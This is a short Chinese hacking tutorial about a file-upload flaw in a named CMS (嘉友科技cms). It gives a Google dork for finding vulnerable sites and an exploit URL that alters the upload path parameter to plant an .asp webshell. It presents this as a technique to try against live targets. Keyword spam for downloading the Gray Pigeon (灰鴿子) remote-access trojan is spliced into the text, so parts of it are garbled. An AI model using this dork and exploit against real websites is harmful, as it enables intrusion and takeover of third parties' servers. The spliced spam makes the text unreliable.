|
修改url的參數(shù)進行突破上傳限制拿webshell 灰鴿子下載
大家可能都看見過這樣的漏洞,這里以瘋子的嘉友科技cms上傳漏洞為例。
谷歌關鍵字:inurl:newslist.asp?NodeCode= 灰鴿子使用教程灰鴿子下載exp:
admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
他原上傳目錄是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出對參數(shù)PicPath進行了修改,
這種漏洞主要是存在文件名或者路徑過濾不嚴,在實戰(zhàn)中多多觀察url中的參數(shù),可以嘗試進行修改數(shù)據(jù)。
|
|